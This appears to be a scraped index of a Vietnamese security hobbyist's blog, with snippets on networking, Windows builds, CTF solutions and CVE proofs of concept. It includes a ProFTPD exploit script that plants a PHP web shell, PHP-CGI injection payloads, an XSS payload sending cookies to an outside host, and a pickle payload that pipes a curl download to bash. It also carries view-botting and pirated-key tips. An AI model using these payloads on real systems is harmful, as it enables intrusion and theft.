Bài đăng

Giả sử một tình huống bạn tình cờ biết rằng có một đợt đăng kí cực kì ưu đãi và chỉ có một slot duy nhất, nếu đăng kí bạn sẽ có một khoản tiền tương đối lớn khoảng 10 tỷ, nếu chậm trễ bạn sẽ chẳng có gì. Tuy nhiên nó yêu cầu bạn cung cấp số điện thoại và chứng minh nhân dân kèm một số thông tin cá nhân riêng tư khác. Bạn không muốn để lộ thông tin cá nhân vì bạn biết điều này sẽ ảnh hưởng về sau của bạn, nên bạn đề nghị một người bạn đi cùng đăng kí hộ và cùng ăn chia tiền thưởng. Ban đầu người bạn đồng ý chia 50:50 nhưng sau khi nghe tin con số lên tới 10 tỷ người bạn muốn họ ăn 80 còn bạn chỉ 20. Lúc này bạn sẽ phản ứng thế nào. Nhìn chung cách mọi người sẽ phản ứng gay gắt với người bạn kia và nghĩ họ tham lam rồi tự mình lấy luôn 10 tỷ. Nhưng nếu cùng nhìn 1 góc độ khác, 2 tỷ cũng không phải là một khoản tiền nhỏ, người bạn kia cũng đánh đổi giá trị là thông tin của họ, còn bạn, bạn chẳng hề mất gì cả nhưng vẫn có 2 tỷ và cả sự biết ơn của người kia. Con người thường kì vọng quá ca...
Gieo một hạt thóc, gặt một cánh đồng nhưng thóc không chăm thì thóc chết Thả con săn sắt bắt con cá rô nhưng cá thả mà không backup thì vô nghĩa Khai thác con người nhưng lơ là bản thân thì vô dụng 
Hình ảnh
 Các chế độ thực thi của switch >: chế độ người dùng Chỉ cho phép truy cập 1 số lệnh giám sát cơ bản #: chế độ đặc quyền Cho phép truy cập vào tất cả các lệnh và tính năng #(config): chế độ thiết lập cấu hình thiết bị được sử dụng để cấu hình thiết bị ---------- cách lệnh phổ thông exit, end, Ctrl + Z, logout, disable: để giảm 1 quyền show: hiển thị trạng thái thiết bị show arp: hiển thị bảng arp show mac: hiển thị cấu hình mac show mac-address-table: hiển thi bảng chuyển tiếp mac show interfaces: hiển thị trạng thái và cấu hình và giao diện show vlan: hiển thị trạng thái vlan show vlan brief: hiển thị tóm tắt của mọi trạng thái vlan show vlan id a: hiển thị tóm tắt của trạng thái vlan nào đó, nếu vlan = 1 thì thay a =1 show running-config: cấu hình hoạt động hiện tại của thiết bị show int fa0/1: hiện thị thông tin interfae fa0/1 show int: hiển thị thông tin của các giao diện show int fa0/3 status: hiển thị trạng thái, vlan, chế độ truyền và cả tốc độ cổng fa0/3 ---------- cấu h...

Native

 HKLM\SYSTEM\CurrentControlSet\Control\ Session Manager\BootExecute (native in  C:\Windows\System32) https://github.com/Fyyre/ntdll https://github.com/winsiderss/phnt  nmake msvc linker -> system -> subsystem(native) linker -> input -> addindependence -> path to ntdll linker -> input -> ignore all default library -> yes C/C++ -> general -> Add include dependence -> path to phnt C/C++ -> code generation -> basic runtime check -> default C/C++ -> code generation -> security check -> disable C/C++ -> General -> debug information -> program database (/Zi) C/C++ -> General -> SDL check -> no sdl

Tao file dll

C/C+ -> Precompiled header -> Precompiled header (not using.)
 Build exe không có console mặc dù là console :D linker-advance -> entrypoint -> mainCRTStartup C/C++ > Code Generation > Runtime Library
 Ta rất muốn xem, với một kẻ không có thiên phú, không có người nâng đỡ, cũng không có người chỉ đường, càng không có bối cảnh to lớn có thể tự thân nỗ lực đi được bao xa. Chỉ với sự quyết tâm và lòng không chịu thua thì một kẻ không có gì có thể vượt qua được kẻ có được tất cả mọi thứ hay không.

Chuyển đổi phiên bản java

 sudo update-alternatives --config java
Intigriti - HackDonals Nextjs - CVE-2025-29927 + XXE

M3U injection on telegram desktop

 https://github.com/SpycioKon/m3u-injection-telegram
Hình ảnh
 Book Dompurify 3.2.2 co vuln nhung ko exploit dc payload http://172.31.3.2:8000/book?title=PGgxIGlkPSJjb25maWciPjxoMSBpZD0iY29uZmlnIiBuYW1lPSJERUJVRyI%2BPC9oMT48L2gxPg%3D%3D&content=PGltZyBzcmM9eDogb25lcnJvcj0iKG5ldyBJbWFnZSkuc3JjPScvL3Bnb2hpaGd2LnJlcXVlc3RyZXBvLmNvbT8nK2RvY3VtZW50LmNvb2tpZSI%2BDQoNCg%3D%3D

python env

└─$ source venv/bin/activate

CVE-2015-3306

#!/usr/bin/env python3 import sys import socket import requests def exploit ( client , target ):     client .connect(( target , 21 )) # Connecting to the target server     banner = client .recv( 74 )     print ( banner .decode())     client .send( b 'site cpfr /proc/self/cmdline \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /tmp/<?php system("id"); ?> \r\n ' ) # phpinfo() is just a PoC.     print ( client .recv( 1024 ).decode())     client .send( b 'site cpfr /tmp/<?php system("id"); ?> \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /var/www/html/konchan.php \r\n ' )     print ( client .recv( 1024 ).decode())     client .close()     print ( 'Exploit Completed' ) def check ( url ):     req = requests . get ( url ) # Requesting the written PoC php file via HT...

CVE-2012-1823/CVE-2024-4577

CVE-2012-1823 && CVE-2024-4577 (PHP CGI ARGURMENT INJECTION) $HOST /?-f C:\Windows\System32\Drivers\etc\hosts $HOST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input <?php system("ls -la"); ?>

Tanr man 2024

 Tản mạn về năm 2024 của Spycio.Kon Một số thành tích nổi bật trong năm - Tự tay host một ctf nhỏ cho team từ A-Z - Tham gia kì thi lấy chứng chỉ quốc tế với tổng thiệt hại là hơn 500$, 20 ngày mất ngủ và 3 tháng ôn tập (mình được một anh đẹp zai hỗ trợ thi hihi), mặc dù chỉ được 2/3 chặng đường (fail) T__T. Em xin lỗi anh rất nhiều. - Đã giải được một số challenges ở một số giải ctf mà năm trước mình khó có thể giải được - Đã viết POC cho một số CVE mình chơi và được một số trang web crawl trúng, khá vui ^^ https://cve.imfht.com/poc_detail/75cc08888950aec9e37a3c206652083d271746e4 https://cvefeed.io/vuln/detail/CVE-2023-41425 https://154.17.20.211 - Nói chuyện được với một số idol quốc tế như IRELAND WITHOUT RE, Microsoft/Synack redteamer/bug hunter,... - Đã viết trên Viblo và cảm thấy bản thân đã có những đóng góp cho cộng đồng lập trình viên trong và ngoài nước mặc dù nó không có gì nhiều =))) https://viblo.asia/p/huong-dan-tao-discord-bot-bang-lm-studio-3kY4g0pyJAe https://viblo...
Hình ảnh
Here is my solution for  Pickleball and Letmein challenges. :< My team planned to join this ctf, but it seems everyone is busy. So sad. Btw thx authors for the great challenges  ---------------------------------------------------------------------------------------------------------------------------- Pickleball: You can refer to the use of opcodes for bypassing,  https://laxiisteam.blogspot.com/2023/09/kma-thi-sinh-vien-attt-cap-hoc-vien-he.html or just run my script    import base64 import pickle payload = b """(cos system S'echo Y3VybCBwamZ3MmxwNS5yZXF1ZXN0cmVwby5jb20=|base64 -d|bash' o""" ab = base64.b64encode(payload) print (ab)  Let me in: This black box challenge has 0 solves. I’ve never worked with Ruby on Rails before, so I encountered quite a few difficulties. Here’s how I approached it  Giao diện nó đây, có 2 chức năng dễ thấy là signup và signin Wappalyzer cho thấy backend có khả năng được viết bằng Ruby Step1: Path travesal View...

CPS

 https://nhienit.wordpress.com/2020/12/03/tim-hieu-ve-csp-content-security-policy/
 Xóa node_modules trong các dự án ko cần  npx npkill

MMO - Black huntres

Hình ảnh
 Hello xin chào mọi người, dạo này mình cũng đang lấn sang mảng MMO nên cũng muốn share mấy cái tips/tricks cho mọi người. Bài 1: Buff view toptop Mọi người đang bài thường bị flop à, không sao. Tool này sẽ giúp mọi người đẩy số view lên. Điền username toptop vô đây Sau đó đợi 1 lát, nhập capcha và đợi Mình buff view nên chỉ cần này thôi Rồi ok làm theo các bước tự buff là ok. Chờ 15p mỗi lần nhé <(")

forwarding requests from desktop app to burpsuite

Hình ảnh
 Bình thường hóa việc mọi người sẽ phải làm với mấy cái ứng dụng linh tinh trên Windows đi :V Một số application không hỗ trợ kết nối proxy để capture request qua burp thì phải làm sao :v Có nhiều cách để capture như dùng HTTP Debugger, Wireshark,... Ở đây mình sẽ chỉ cho mọi người một tool khá ngon mới cop nhặt được trên mạng =)) Mở bài: Proxifier Đầu tiên thì Download nó về, nó có free trial 30 ngày nhưng mà mình thì không thích lắm nên dùng key kích hoạt luôn <(") Giao diện nó như này Click Profile -> Proxy Server  Mình muốn bắt qua burp thì sẽ cấu hình như sau rồi OK  Bây giờ thử test xem nó có work hay không Ok vậy là được  Ở đây mình sẽ test với zalo.exe. Các bước thì làm như sau Qua burp và bắt req thôi, gõ đại cái gì trên Zalo đi :Vv Tuy nhiên, một số ứng dụng sẽ cần qua giao thức https nên là phải thêm cert của burp vô máy nữa. Lấy cert bằng cách sau Win + R -> nhập certmgr.msc Rồi import vô là xong. Chúc các bạn thành công. Kết bài:  Cảm ơn vì...